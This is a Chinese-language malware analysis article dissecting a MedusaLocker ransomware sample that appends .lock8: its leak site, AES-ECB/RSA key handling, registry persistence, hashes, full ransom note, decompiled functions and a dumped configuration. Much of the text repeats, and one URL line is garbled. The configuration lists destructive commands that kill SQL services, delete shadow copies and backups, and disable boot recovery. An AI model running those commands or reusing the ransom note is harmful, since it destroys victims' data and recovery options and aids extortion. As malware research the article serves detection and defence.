首页课程文章
无痕注入APC注入线程注入读写驱动注入技术句柄表进程线程系统调用保护模式内存管理远程CALL软件调试驱动封装云下发驱动开发FPS数据方框透视FPS方框FPS自瞄CED3DHOOKD3D绘制Imgui绘制DWM
内核课程驱动出租学习路线聊天室免责声明提问技巧

软件逆向-【病毒分析】深入剖析MedusaLocker勒索家族:从密钥生成到文件加密的全链路解析

推荐 原创

周杰伦

文章分类软件逆向阅读数 : 22阅读时长 : 9分钟


【软件逆向-【病毒分析】深入剖析MedusaLocker勒索家族:从密钥生成到文件加密的全链路解析】此文章归类为:软件逆向。

MedusaLocker 家族首次于 2019 年 9 月出现,MedusaLocker 家族通常通过有漏洞的远程桌面协议(RDP)配置获取受害者设备访问权限,攻击者还经常使用电子邮件钓鱼和垃圾邮件活动——直接将勒索软件附加到电子邮件中——作为初始入侵渠道。

MedusaLocker 会对受害者的数据进行加密,并在每个包含加密文件的文件夹中留下勒索信。勒索信要求受害者向特定的比特币钱包地址支付赎金。根据观察,MedusaLocker 似乎采用勒索软件即服务(RaaS)模型运营。典型的 RaaS 模型包括勒索软件开发者与负责在受害者系统上部署勒索软件的附属公司。MedusaLocker 的赎金支付通常会在附属公司之间分配,附属公司会获得 55% 到 60% 的赎金,剩余部分则交给开发者。

MedusaLocker家族提供两个暗网地址:一个是博客,另一个是聊天室。博客中留有Tox联系方式,并会公开所有受害者的信息,点击特定受害者后,可以查看其详细的泄露数据和赎金要求;聊天室则要求输入ID和联系邮箱,且支持上传一个被加密的文件进行测试。提交后,系统将为受害者生成一个独立的聊天室,供其与MedusaLocker家族进行私密交流,其他人无法查看该对话内容。


博客首页

数据详情页

加载进入聊天室


成功创建独立聊天室

独立聊天室页面

sierting.txt


由于样本不加密1000字节大小以下的文件,因此手动填充测试文件增加至1000字节大小并进行加密。

加密文件名 = 原始文件名+lock8 ,例如:sierting.txt.lock8

文件加密使用了AES-ECB加密算法,对加密文件的AES密钥,采用了RSA加密。

KEY

通过调用CryptGenRandom函数生成密钥

内置rsa公钥如下

调用API函数CryptGenKey生成密钥对。

创建作业对象

加载资源

自解密生成配置信息

配置资源中的公钥

将配置资源中的公钥进行base64解码,以便后续加密使用

得到base64解码后的公钥

将程序自身添加到开机启动项中

执行完毕后,可以从SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run注册表中观察到如下内容:

初始化RSA加密对象,生成RSA公钥和私钥

生成的rsa公钥如下

生成的RSA私钥如下

对刚刚生成的RSA私钥进行加密

加密RSA私钥后的数据如下

再把刚刚的公钥进行base64编码

结果如下

然后将刚刚加密后的加密数据也用base64编码

将自带的RSA公钥和后生成并且加密后的RSA私钥写入到注册表SOFTWARE\\PAIDMEMESPUBLICPRIVATE的键值中

创建管道异步执行命令,并获取返回

执行如下几个命令

枚举卷

判断当前进程是否以管理员权限运行

遍历网络驱动器

遍历目录,并过滤下面几个目录

遍历文件,判断文件是否为勒索信

判断文件是否大于0x1000

过滤后缀

过滤的后缀如下

生成aes的key

用一开始生成的公钥将刚刚生成的key用rsa加密

给文件添加加密后缀

在开始加密前,他会先将后生成并且加密后的rsa私钥和加密后的aes密钥写入末尾


以及写了了一串用于标识的加密序列

使用aes-ecb加密文件

MedusaLocker勒索病毒采用AES-ECB对文件进行加密,并使用RSA加密AES密钥,以确保数据无法轻易恢复。病毒执行时,首先调用CryptGenRandom生成AES密钥,并随机生成的RSA私钥钥用于加密该密钥。随后,程序初始化配置,创建任务对象,加载资源,并生成公钥,同时写入注册表。病毒还会添加开机启动项,以维持持久性。执行过程中,它会强制终止SQL Server相关进程、清除备份与恢复点,并遍历系统目录和网络驱动器,筛选目标文件进行加密。在加密前,病毒将RSA私钥和AES密钥加密后写入文件末尾,确保受害者无法解密文件。

文件名 lock8.exe
编译器 Microsoft Visual C/C++(19.36.33523)[LTCG/C++]
大小 419.5 KB
操作系统 Windows(Vista)[AMD64, 64位, Console]
模式 64 位
类型 EXEC
字节序 LE
MD5 7d08b5bcfcb0170f82820785944f30fb
SHA1 854443513882ca2837d4ff30eca7143ec3e06b4d
SHA256 33ca49acd304ed65753aced17aab019143d04c59bb3082b3f74f0376bf4ef2c8
YOUR COMPANY NETWORK HAS BEEN PENETRATED! All your important files have been encrypted! Your files are safe! Only modified. (RSA+AES) ANY ATTEMPT TO RESTORE YOUR FILES WITH THIRD-PARTY SOFTWARE WILL PERMANENTLY CORRUPT IT. DO NOT MODIFY ENCRYPTED FILES. DO NOT RENAME ENCRYPTED FILES. No software available on internet can help you. We are the only ones able to solve your problem. We gathered highly confidential/personal data. These data are currently stored on a private server. This server will be immediately destroyed after your payment. If you decide to not pay, we will release your data to public or re-seller. So you can expect your data to be publicly available in the near future.. We only seek money and our goal is not to damage your reputation or prevent your business from running. You will can send us 2-3 non-important files and we will decrypt it for free to prove we are able to give your files back. pomocit07@kanzensei.top pomocit07@surakshaguardian.com To contact us, create a new free email account on the site: https://protonmail.com YOU DON'T CONTACT US WITHIN 72 HOURS, PRICE WILL BE HIGHER. TOR LINK>>>>>>>>>
YOUR COMPANY NETWORK HAS BEEN PENETRATED! All your important files have been encrypted! Your files are safe! Only modified. (RSA+AES) ANY ATTEMPT TO RESTORE YOUR FILES WITH THIRD-PARTY SOFTWARE WILL PERMANENTLY CORRUPT IT. DO NOT MODIFY ENCRYPTED FILES. DO NOT RENAME ENCRYPTED FILES. No software available on internet can help you. We are the only ones able to solve your problem. We gathered highly confidential/personal data. These data are currently stored on a private server. This server will be immediately destroyed after your payment. If you decide to not pay, we will release your data to public or re-seller. So you can expect your data to be publicly available in the near future.. We only seek money and our goal is not to damage your reputation or prevent your business from running. You will can send us 2-3 non-important files and we will decrypt it for free to prove we are able to give your files back. pomocit07@kanzensei.top pomocit07@surakshaguardian.com To contact us, create a new free email account on the site: https://protonmail.com YOU DON'T CONTACT US WITHIN 72 HOURS, PRICE WILL BE HIGHER. TOR LINK>>>>>>>>>
病毒家族 medusalocker
首次出现时间/捕获分析时间 2024/11/19 || 2025/1/14
威胁类型 勒索软件,加密病毒
加密文件扩展名 .lock8
勒索信文件名 How_to_back_files.txt
有无免费解密器?
联系邮箱 pomocit07@surakshaguardian.com
检测名称 Avast (Win32:Malware-gen), AhnLab-V3 (Trojan/Win.Generic.C5576951), ALYac (Gen:Variant.Tedy.512515), Avira (no cloud) (TR/Ransom.imrnt), BitDefenderTheta (Gen:NN.ZexaF.36802.yq0@aSdxC8m), CrowdStrike Falcon (Win/malicious_confidence_100% (W)),Cylance(Unsafe),DeepInstinct(MALICIOUS),Emsisoft(Gen:Variant.Tedy.512515 (B)),ESET-NOD32(A Variant Of MSIL/Filecoder.LU),GData(Gen:Variant.Tedy.512515), Ikarus (Trojan.MSIL.Crypt),K7GW(Trojan ( 0052f4e41 ))
感染症状 无法打开存储在计算机上的文件,以前功能的文件现在具有不同的扩展名(例如,solar.docx.lock8)。桌面上会显示一条勒索要求消息。网络犯罪分子要求支付赎金(通常以比特币)来解锁您的文件。
感染方式 受感染的电子邮件附件(宏)、恶意广告、漏洞利用、恶意链接
受灾影响 所有文件都经过加密,如果不支付赎金就无法打开。其他密码窃取木马和恶意软件感染可以与勒索软件感染一起安装。
BgIAAACkAABSU0ExAAgAAAEAAQCxqoL0k0/YLfeTuPHXZiEZzVTcuPk5h0izy5IDOhdtaanwWwryebK7LqJH+fuVByE6iC/FcXp5ADHd8jFQ4Vc+QLUuVWTgkZ/tSNaK52ZEsMROdjSO29BPUNFWy9dLUKu8KmgmkBn51d4AajIox99fxyJ5YHAldMaw7JYMUi5M0THBvhEb2bjUIkQBlwpGyceOzdT/lKCL9nd6cknOiKEim/kyS59Mkw1yY8satLbB6G1DN48nEieAh258/c/leX4EFul6lhXo/MIdokzvEQRqu0w949BMybv2Eqo8/inevFo2yk3N/Eozq31gF5KiPxpy+Zgrz3mrC+nduwbPo830
BgIAAACkAABSU0ExAAgAAAEAAQCxqoL0k0/YLfeTuPHXZiEZzVTcuPk5h0izy5IDOhdtaanwWwryebK7LqJH+fuVByE6iC/FcXp5ADHd8jFQ4Vc+QLUuVWTgkZ/tSNaK52ZEsMROdjSO29BPUNFWy9dLUKu8KmgmkBn51d4AajIox99fxyJ5YHAldMaw7JYMUi5M0THBvhEb2bjUIkQBlwpGyceOzdT/lKCL9nd6cknOiKEim/kyS59Mkw1yY8satLbB6G1DN48nEieAh258/c/leX4EFul6lhXo/MIdokzvEQRqu0w949BMybv2Eqo8/inevFo2yk3N/Eozq31gF5KiPxpy+Zgrz3mrC+nduwbPo830
printf_0((char *)L"[-] Context initialize...\n");
 JobObjectW = CreateJobObjectW(0LL, 0LL);
 hJob = JobObjectW;
 if ( JobObjectW )
 {
   JobObjectInformation = 0;
   v1 = 0.0;
   v45 = 0LL;
   v46 = 0LL;
   v47 = 0LL;
   v48 = 0LL;
   v49 = 0LL;
   v50 = 0LL;
   v51 = 0LL;
   v52 = 0LL;
   v53 = 0LL;
   v54 = 0;
   HIDWORD(v45) = 0x2000;
   if ( !SetInformationJobObject(JobObjectW, JobObjectExtendedLimitInformation, &JobObjectInformation, 0x90u) )
   {
     GetLastError();
     printf_0((char *)L"[!] SetInformationJobObject failed 0x%X\n");
     return 0;
   }
 }
 else
 {
   v1 = printf_0((char *)L"[!] Job object not created\n");
 }
printf_0((char *)L"[-] Context initialize...\n");
 JobObjectW = CreateJobObjectW(0LL, 0LL);
 hJob = JobObjectW;
 if ( JobObjectW )
 {
   JobObjectInformation = 0;
   v1 = 0.0;
   v45 = 0LL;
   v46 = 0LL;
   v47 = 0LL;
   v48 = 0LL;
   v49 = 0LL;
   v50 = 0LL;
   v51 = 0LL;
   v52 = 0LL;
   v53 = 0LL;
   v54 = 0;
   HIDWORD(v45) = 0x2000;
   if ( !SetInformationJobObject(JobObjectW, JobObjectExtendedLimitInformation, &JobObjectInformation, 0x90u) )
   {
     GetLastError();
     printf_0((char *)L"[!] SetInformationJobObject failed 0x%X\n");
     return 0;
   }
 }
 else
 {
   v1 = printf_0((char *)L"[!] Job object not created\n");
 }
// Hidden C++ exception states: #wind=1
__int64 __fastcall load_resource(__int64 a1, __int64 a2, const WCHAR **a3)
{
  const WCHAR *v4; // rsi
  HMODULE ModuleHandleW; // rax
  HMODULE v6; // rbx
  HRSRC ResourceW; // rax
  HRSRC v8; // rdi
  HGLOBAL Resource; // rax
  const void *v10; // rbp
  DWORD v11; // eax
  __int64 v12; // rbx
  __int64 v13; // rsi
  _BYTE *v14; // rdi
  _BYTE *v15; // r15
  size_t v16; // r15
  char *v17; // rbx
  _BYTE *v18; // rax
  void *Src[2]; // [rsp+28h] [rbp-30h] BYREF
  __int64 v21; // [rsp+38h] [rbp-20h]
 
  v4 = *a3;
  printf_0((char *)L"[-] Get resource with id %i and type %s...\n");
  ModuleHandleW = GetModuleHandleW(0LL);
  v6 = ModuleHandleW;
  if ( ModuleHandleW
    && (ResourceW = FindResourceW(ModuleHandleW, (LPCWSTR)0x65, v4), (v8 = ResourceW) != 0LL)
    && (Resource = LoadResource(v6, ResourceW)) != 0LL
    && (v10 = LockResource(Resource)) != 0LL )
  {
    v11 = SizeofResource(v6, v8);
    v12 = v11;
    *(_OWORD *)Src = 0LL;
    v13 = 0LL;
    v21 = 0LL;
    if ( v11 )
    {
      alloc_memory(Src, v11);
      v14 = Src[0];
      memset(Src[0], 0, (unsigned int)v12);
      v15 = &v14[v12];
      Src[1] = &v14[v12];
      v13 = v21;
    }
    else
    {
      v15 = Src[1];
      v14 = Src[0];
    }
    v16 = v15 - v14;
    memcpy(v14, v10, v16);
    *(_BYTE *)a1 = 1;
    *(_QWORD *)(a1 + 8) = 0LL;
    *(_QWORD *)(a1 + 16) = 0LL;
    *(_QWORD *)(a1 + 24) = 0LL;
    if ( v16 )
    {
      if ( v16 > 0x7FFFFFFFFFFFFFFFLL )
        unknown_libname_6();
      alloc_memory((_QWORD *)(a1 + 8), v16);
      v17 = *(char **)(a1 + 8);
      memcpy(v17, v14, v16);
      *(_QWORD *)(a1 + 16) = &v17[v16];
    }
    if ( v14 )
    {
      v18 = v14;
      if ( (unsigned __int64)(v13 - (_QWORD)v14) >= 0x1000 )
      {
        v14 = (_BYTE *)*((_QWORD *)v14 - 1);
        if ( (unsigned __int64)(v18 - v14 - 8) > 0x1F )
          invalid_parameter_noinfo_noreturn();
      }
      j_j_free(v14);
    }
  }
  else
  {
    printf_0((char *)L"[!] Resource with id %i and type %s not found\n");
    *(_BYTE *)a1 = 0;
    *(_QWORD *)(a1 + 8) = 0LL;
    *(_QWORD *)(a1 + 16) = 0LL;
    *(_QWORD *)(a1 + 24) = 0LL;
  }
  return a1;
}
// Hidden C++ exception states: #wind=1
__int64 __fastcall load_resource(__int64 a1, __int64 a2, const WCHAR **a3)
{
  const WCHAR *v4; // rsi
  HMODULE ModuleHandleW; // rax
  HMODULE v6; // rbx
  HRSRC ResourceW; // rax
  HRSRC v8; // rdi
  HGLOBAL Resource; // rax
  const void *v10; // rbp
  DWORD v11; // eax
  __int64 v12; // rbx
  __int64 v13; // rsi
  _BYTE *v14; // rdi
  _BYTE *v15; // r15
  size_t v16; // r15
  char *v17; // rbx
  _BYTE *v18; // rax
  void *Src[2]; // [rsp+28h] [rbp-30h] BYREF
  __int64 v21; // [rsp+38h] [rbp-20h]
 
  v4 = *a3;
  printf_0((char *)L"[-] Get resource with id %i and type %s...\n");
  ModuleHandleW = GetModuleHandleW(0LL);
  v6 = ModuleHandleW;
  if ( ModuleHandleW
    && (ResourceW = FindResourceW(ModuleHandleW, (LPCWSTR)0x65, v4), (v8 = ResourceW) != 0LL)
    && (Resource = LoadResource(v6, ResourceW)) != 0LL
    && (v10 = LockResource(Resource)) != 0LL )
  {
    v11 = SizeofResource(v6, v8);
    v12 = v11;
    *(_OWORD *)Src = 0LL;
    v13 = 0LL;
    v21 = 0LL;
    if ( v11 )
    {
      alloc_memory(Src, v11);
      v14 = Src[0];
      memset(Src[0], 0, (unsigned int)v12);
      v15 = &v14[v12];
      Src[1] = &v14[v12];
      v13 = v21;
    }
    else
    {
      v15 = Src[1];
      v14 = Src[0];
    }
    v16 = v15 - v14;
    memcpy(v14, v10, v16);
    *(_BYTE *)a1 = 1;
    *(_QWORD *)(a1 + 8) = 0LL;
    *(_QWORD *)(a1 + 16) = 0LL;
    *(_QWORD *)(a1 + 24) = 0LL;
    if ( v16 )
    {
      if ( v16 > 0x7FFFFFFFFFFFFFFFLL )
        unknown_libname_6();
      alloc_memory((_QWORD *)(a1 + 8), v16);
      v17 = *(char **)(a1 + 8);
      memcpy(v17, v14, v16);
      *(_QWORD *)(a1 + 16) = &v17[v16];
    }
    if ( v14 )
    {
      v18 = v14;
      if ( (unsigned __int64)(v13 - (_QWORD)v14) >= 0x1000 )
      {
        v14 = (_BYTE *)*((_QWORD *)v14 - 1);
        if ( (unsigned __int64)(v18 - v14 - 8) > 0x1F )
          invalid_parameter_noinfo_noreturn();
      }
      j_j_free(v14);
    }
  }
  else
  {
    printf_0((char *)L"[!] Resource with id %i and type %s not found\n");
    *(_BYTE *)a1 = 0;
    *(_QWORD *)(a1 + 8) = 0LL;
    *(_QWORD *)(a1 + 16) = 0LL;
    *(_QWORD *)(a1 + 24) = 0LL;
  }
  return a1;
}
  LODWORD(v145) = 0;
  LODWORD(v144) = 0;
  printf_0((char *)L"[-] Load settings from resource...\n");
  v123 = *(_OWORD *)get_length(&v126, L"SETTINGS");
  load_resource((__int64)v139, v1, (const WCHAR **)&v123);
  if ( !v139[0] )
  {
    v6 = 0;
    v3 = Block[0];
    goto LABEL_180;
  }
  *(_QWORD *)&v123 = "PUTINHUILO1337";
  *((_QWORD *)&v123 + 1) = 14LL;
  v129 = v123;
  v2 = xor_data((void **)&pExceptionObject, (__int64)Block, (__int64 *)&v129);
  move_0(Block, v2);
debug055:00000223EA917340 aBchiperdrivesT db '{',0Ah              ; DATA XREF: Stack[00000A50]:00000062440FEA90↑o
debug055:00000223EA917342 db '"bChiperDrives": true,',0Ah
debug055:00000223EA917359 db '"bHideConsole": false,',0Ah
debug055:00000223EA917370 db '"bRemoveRecycle": true,',0Ah
debug055:00000223EA917388 db '"bThreadPool": false,',0Ah
debug055:00000223EA91739E db '"nEncryptionBlockBytes": 750016,',0Ah
debug055:00000223EA9173BF db '"nEncryptionLimitBytes": 2780352,',0Ah
debug055:00000223EA9173E1 db '"nEncryptionSkipBytes": 250048,',0Ah
debug055:00000223EA917401 db '"nEncryptionType": 1,',0Ah
debug055:00000223EA917417 db '"nEncryptionTypeIO": 0,',0Ah
debug055:00000223EA91742F db '"nThreads": 0,',0Ah
debug055:00000223EA91743E db '"sEncryptedFileExtension": ".lock8",',0Ah
debug055:00000223EA917463 db '"sMasterPublicKey": "BgIAAACkAABSU0ExAAgAAAEAAQCxqoL0k0/YLfeTuPHX'
debug055:00000223EA9174A4 db 'ZiEZzVTcuPk5h0izy5IDOhdtaanwWwryebK7LqJH+fuVByE6iC/FcXp5ADHd8jFQ4'
debug055:00000223EA9174E5 db 'Vc+QLUuVWTgkZ/tSNaK52ZEsMROdjSO29BPUNFWy9dLUKu8KmgmkBn51d4AajIox9'
debug055:00000223EA917526 db '9fxyJ5YHAldMaw7JYMUi5M0THBvhEb2bjUIkQBlwpGyceOzdT/lKCL9nd6cknOiKE'
debug055:00000223EA917567 db 'im/kyS59Mkw1yY8satLbB6G1DN48nEieAh258/c/leX4EFul6lhXo/MIdokzvEQRq'
debug055:00000223EA9175A8 db 'u0w949BMybv2Eqo8/inevFo2yk3N/Eozq31gF5KiPxpy+Zgrz3mrC+nduwbPo830"'
debug055:00000223EA9175E9 db ',',0Ah
debug055:00000223EA9175EB db '"sRequirementsData": "  YOUR COMPANY NETWORK HAS BEEN PENETRATED!'
debug055:00000223EA91762C db '\n\n    All your important files have been encrypted!\n\n        '
debug055:00000223EA91766D db '     Your files are safe! Only modified. (RSA+AES)\n\n  ANY ATTEM'
debug055:00000223EA9176AE db 'PT TO RESTORE YOUR FILES WITH THIRD-PARTY SOFTWARE\n  WILL PERMAN'
debug055:00000223EA9176EF db 'ENTLY CORRUPT IT.\n  DO NOT MODIFY ENCRYPTED FILES.\n  DO NOT REN'
debug055:00000223EA917730 db 'AME ENCRYPTED FILES.\n\n  No software available on internet can h'
debug055:00000223EA917771 db 'elp you. We are the only ones able to\n  solve your problem.\n\n '
debug055:00000223EA9177B2 db ' We gathered highly confidential/personal data. These data are cu'
debug055:00000223EA9177F3 db 'rrently stored on\n  a private server. This server will be immedi'
debug055:00000223EA917834 db 'ately destroyed after your payment.\n  If you decide to not pay, '
debug055:00000223EA917875 db 'we will release your data to public or re-seller.\n  So you can e'
debug055:00000223EA9178B6 db 'xpect your data to be publicly available in the near future..\n\n'
debug055:00000223EA9178F7 db '\n  We only seek money and our goal is not to damage your reputat'
debug055:00000223EA917938 db 'ion or prevent\n  your business from running.\n\n  You will can s'
debug055:00000223EA917979 db 'end us 2-3 non-important files and we will decrypt it for free\n '
debug055:00000223EA9179BA db ' to prove we are able to give your files back.\n  pomocit07@kanze'
debug055:00000223EA9179FB db 'nsei.top\n  pomocit07@surakshaguardian.com\n  To contact us, crea'
debug055:00000223EA917A3C db 'te a new free email account on the site: 770K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6H3M7X3!0@1L8$3&6E0j5h3W2D9i4K6u0W2j5$3!0E0i4K6g2o6L8W2)9J5y4H3`.`.
debug055:00000223EA917A7D db '\n\n   YOU DON',27h,'T CONTACT US WITHIN 72 HOURS, PRICE WILL BE '
debug055:00000223EA917AB8 db 'HIGHER.\n\n   TOR LINK>>>>>>>>>  qd7pcafncosqfqu3ha6fcx4h6sr7tzwa'
debug055:00000223EA917AF9 db 'gzpcdcnytiw3b6varaeqv5yd.onion\n",',0Ah
debug055:00000223EA917B1C db '"sRequirementsFilename": "How_to_back_files.txt",',0Ah
debug055:00000223EA917B4E db '"vecFullEncryptionExtensions": [],',0Ah
debug055:00000223EA917B71 db '"vecPostRunCommands": [],',0Ah
debug055:00000223EA917B8B db '"vecPreRunCommands": [',0Ah
debug055:00000223EA917BA2 db '"rem Kill \"SQL\"",',0Ah
debug055:00000223EA917BB6 db '"taskkill -f -im sqlbrowser.exe",',0Ah
debug055:00000223EA917BD8 db '"taskkill -f -im sql writer.exe",',0Ah
debug055:00000223EA917BFA db '"taskkill -f -im sqlserv.exe",',0Ah
debug055:00000223EA917C19 db '"taskkill -f -im msmdsrv.exe",',0Ah
debug055:00000223EA917C38 db '"taskkill -f -im MsDtsSrvr.exe",',0Ah
debug055:00000223EA917C59 db '"taskkill -f -im sqlceip.exe",',0Ah
debug055:00000223EA917C78 db '"taskkill -f -im fdlauncher.exe",',0Ah
debug055:00000223EA917C9A db '"taskkill -f -im Ssms.exe",',0Ah
debug055:00000223EA917CB6 db '"taskkill -f -im SQLAGENT.EXE",',0Ah
debug055:00000223EA917CD6 db '"taskkill -f -im fdhost.exe",',0Ah
debug055:00000223EA917CF4 db '"taskkill -f -im ReportingServicesService.exe",',0Ah
debug055:00000223EA917D24 db '"taskkill -f -im msftesql.exe",',0Ah
debug055:00000223EA917D44 db '"taskkill -f -im pg_ctl.exe",',0Ah
debug055:00000223EA917D62 db '"taskkill -f -impostgres.exe",',0Ah
debug055:00000223EA917D81 db '"net stop MSSQLServerADHelper100",',0Ah
debug055:00000223EA917DA4 db '"net stop MSSQL$ISARS",',0Ah
debug055:00000223EA917DBC db '"net stop MSSQL$MSFW",',0Ah
debug055:00000223EA917DD3 db '"net stop SQLAgent$ISARS",',0Ah
debug055:00000223EA917DEE db '"net stop SQLAgent$MSFW",',0Ah
debug055:00000223EA917E08 db '"net stop SQLBrowser",',0Ah
debug055:00000223EA917E1F db '"net stop REportServer$ISARS",',0Ah
debug055:00000223EA917E3E db '"net stop SQLWriter",',0Ah
debug055:00000223EA917E54 db '"vssadmin.exe Delete Shadows /All /Quiet",',0Ah
debug055:00000223EA917E7F db '"wbadmin delete backup -keepVersion:0 -quiet",',0Ah
debug055:00000223EA917EAE db '"wbadmin DELETE SYSTEMSTABACKUP -deleteOldest",',0Ah
debug055:00000223EA917EDE db '"wmic.exe SHADOWCOPY /nointeractive",',0Ah
debug055:00000223EA917F04 db '"bcdedit.exe /set {default} recoverynabled No",',0Ah
debug055:00000223EA917F34 db '"bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"',0Ah
debug055:00000223EA917F74 db '],',0Ah
debug055:00000223EA917F77 db '"vecProgramFilesPath": [',0Ah
debug055:00000223EA917F90 db '"\\Microsoft SQL Server\\",',0Ah
debug055:00000223EA917FAC db '"\\Microsoft SQL Server Management Studio 18\\"',0Ah
debug055:00000223EA917FDC db '],',0Ah
debug055:00000223EA917FDF db '"vecSkipFileExtensions": [',0Ah
debug055:00000223EA917FFA db '".exe",',0Ah
debug055:00000223EA918002 db '".dll",',0Ah
debug055:00000223EA91800A db '".sys",',0Ah
debug055:00000223EA918012 db '".ini",',0Ah
debug055:00000223EA91801A db '".rdp",',0Ah
debug055:00000223EA918022 db '".lnk",',0Ah
debug055:00000223EA91802A db '".bmp",',0Ah
debug055:00000223EA918032 db '".mov",',0Ah
debug055:00000223EA91803A db '".cab",',0Ah
debug055:00000223EA918042 db '".url",',0Ah
debug055:00000223EA91804A db '".vsix",',0Ah
debug055:00000223EA918053 db '".msi",',0Ah
debug055:00000223EA91805B db '".pyc",',0Ah
debug055:00000223EA918063 db '".pyd",',0Ah
debug055:00000223EA91806B db '".vdm",',0Ah
debug055:00000223EA918073 db '".json"',0Ah
debug055:00000223EA91807B db '],',0Ah
debug055:00000223EA91807E db '"vecSkipPaths": [',0Ah
debug055:00000223EA918090 db '"C:\\perflogs",',0Ah
debug055:00000223EA9180A0 db '"C:\\Intel",',0Ah
debug055:00000223EA9180AD db '"C:\\HP",',0Ah
debug055:00000223EA9180B7 db '"C:\\AMD",',0Ah
debug055:00000223EA9180C2 db '"C:\\Dell",',0Ah
debug055:00000223EA9180CE db '"C:\\Drivers",',0Ah
debug055:00000223EA9180DD db '"C:\\inetpub",',0Ah
debug055:00000223EA9180EC db '"B:\\Boot",',0Ah
debug055:00000223EA9180F8 db '"A:\\Boot",',0Ah
debug055:00000223EA918104 db '"B:\\EFI",',0Ah
debug055:00000223EA91810F db '"A:\\EFI",',0Ah
debug055:00000223EA91811A db '"C:\\ProgramData\\AnyDesk",',0Ah
debug055:00000223EA918136 db '":\\Boot",',0Ah
debug055:00000223EA918141 db '"\\appdata\\"',0Ah
debug055:00000223EA91814F db ']',0Ah,'}'
  LODWORD(v145) = 0;
  LODWORD(v144) = 0;
  printf_0((char *)L"[-] Load settings from resource...\n");
  v123 = *(_OWORD *)get_length(&v126, L"SETTINGS");
  load_resource((__int64)v139, v1, (const WCHAR **)&v123);
  if ( !v139[0] )
  {
    v6 = 0;
    v3 = Block[0];
    goto LABEL_180;
  }
  *(_QWORD *)&v123 = "PUTINHUILO1337";
  *((_QWORD *)&v123 + 1) = 14LL;
  v129 = v123;
  v2 = xor_data((void **)&pExceptionObject, (__int64)Block, (__int64 *)&v129);
  move_0(Block, v2);
debug055:00000223EA917340 aBchiperdrivesT db '{',0Ah              ; DATA XREF: Stack[00000A50]:00000062440FEA90↑o
debug055:00000223EA917342 db '"bChiperDrives": true,',0Ah
debug055:00000223EA917359 db '"bHideConsole": false,',0Ah
debug055:00000223EA917370 db '"bRemoveRecycle": true,',0Ah
debug055:00000223EA917388 db '"bThreadPool": false,',0Ah
debug055:00000223EA91739E db '"nEncryptionBlockBytes": 750016,',0Ah
debug055:00000223EA9173BF db '"nEncryptionLimitBytes": 2780352,',0Ah
debug055:00000223EA9173E1 db '"nEncryptionSkipBytes": 250048,',0Ah
debug055:00000223EA917401 db '"nEncryptionType": 1,',0Ah
debug055:00000223EA917417 db '"nEncryptionTypeIO": 0,',0Ah
debug055:00000223EA91742F db '"nThreads": 0,',0Ah
debug055:00000223EA91743E db '"sEncryptedFileExtension": ".lock8",',0Ah
debug055:00000223EA917463 db '"sMasterPublicKey": "BgIAAACkAABSU0ExAAgAAAEAAQCxqoL0k0/YLfeTuPHX'
debug055:00000223EA9174A4 db 'ZiEZzVTcuPk5h0izy5IDOhdtaanwWwryebK7LqJH+fuVByE6iC/FcXp5ADHd8jFQ4'
debug055:00000223EA9174E5 db 'Vc+QLUuVWTgkZ/tSNaK52ZEsMROdjSO29BPUNFWy9dLUKu8KmgmkBn51d4AajIox9'
debug055:00000223EA917526 db '9fxyJ5YHAldMaw7JYMUi5M0THBvhEb2bjUIkQBlwpGyceOzdT/lKCL9nd6cknOiKE'
debug055:00000223EA917567 db 'im/kyS59Mkw1yY8satLbB6G1DN48nEieAh258/c/leX4EFul6lhXo/MIdokzvEQRq'
debug055:00000223EA9175A8 db 'u0w949BMybv2Eqo8/inevFo2yk3N/Eozq31gF5KiPxpy+Zgrz3mrC+nduwbPo830"'
debug055:00000223EA9175E9 db ',',0Ah
debug055:00000223EA9175EB db '"sRequirementsData": "  YOUR COMPANY NETWORK HAS BEEN PENETRATED!'
debug055:00000223EA91762C db '\n\n    All your important files have been encrypted!\n\n        '
debug055:00000223EA91766D db '     Your files are safe! Only modified. (RSA+AES)\n\n  ANY ATTEM'
debug055:00000223EA9176AE db 'PT TO RESTORE YOUR FILES WITH THIRD-PARTY SOFTWARE\n  WILL PERMAN'
debug055:00000223EA9176EF db 'ENTLY CORRUPT IT.\n  DO NOT MODIFY ENCRYPTED FILES.\n  DO NOT REN'
debug055:00000223EA917730 db 'AME ENCRYPTED FILES.\n\n  No software available on internet can h'
debug055:00000223EA917771 db 'elp you. We are the only ones able to\n  solve your problem.\n\n '
debug055:00000223EA9177B2 db ' We gathered highly confidential/personal data. These data are cu'
debug055:00000223EA9177F3 db 'rrently stored on\n  a private server. This server will be immedi'
debug055:00000223EA917834 db 'ately destroyed after your payment.\n  If you decide to not pay, '
debug055:00000223EA917875 db 'we will release your data to public or re-seller.\n  So you can e'
debug055:00000223EA9178B6 db 'xpect your data to be publicly available in the near future..\n\n'
debug055:00000223EA9178F7 db '\n  We only seek money and our goal is not to damage your reputat'
debug055:00000223EA917938 db 'ion or prevent\n  your business from running.\n\n  You will can s'
debug055:00000223EA917979 db 'end us 2-3 non-important files and we will decrypt it for free\n '
debug055:00000223EA9179BA db ' to prove we are able to give your files back.\n  pomocit07@kanze'
debug055:00000223EA9179FB db 'nsei.top\n  pomocit07@surakshaguardian.com\n  To contact us, crea'
debug055:00000223EA917A3C db 'te a new free email account on the site: 770K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6H3M7X3!0@1L8$3&6E0j5h3W2D9i4K6u0W2j5$3!0E0i4K6g2o6L8W2)9J5y4H3`.`.
debug055:00000223EA917A7D db '\n\n   YOU DON',27h,'T CONTACT US WITHIN 72 HOURS, PRICE WILL BE '
debug055:00000223EA917AB8 db 'HIGHER.\n\n   TOR LINK>>>>>>>>>  qd7pcafncosqfqu3ha6fcx4h6sr7tzwa'
debug055:00000223EA917AF9 db 'gzpcdcnytiw3b6varaeqv5yd.onion\n",',0Ah
debug055:00000223EA917B1C db '"sRequirementsFilename": "How_to_back_files.txt",',0Ah
debug055:00000223EA917B4E db '"vecFullEncryptionExtensions": [],',0Ah
debug055:00000223EA917B71 db '"vecPostRunCommands": [],',0Ah
debug055:00000223EA917B8B db '"vecPreRunCommands": [',0Ah
debug055:00000223EA917BA2 db '"rem Kill \"SQL\"",',0Ah
debug055:00000223EA917BB6 db '"taskkill -f -im sqlbrowser.exe",',0Ah
debug055:00000223EA917BD8 db '"taskkill -f -im sql writer.exe",',0Ah
debug055:00000223EA917BFA db '"taskkill -f -im sqlserv.exe",',0Ah
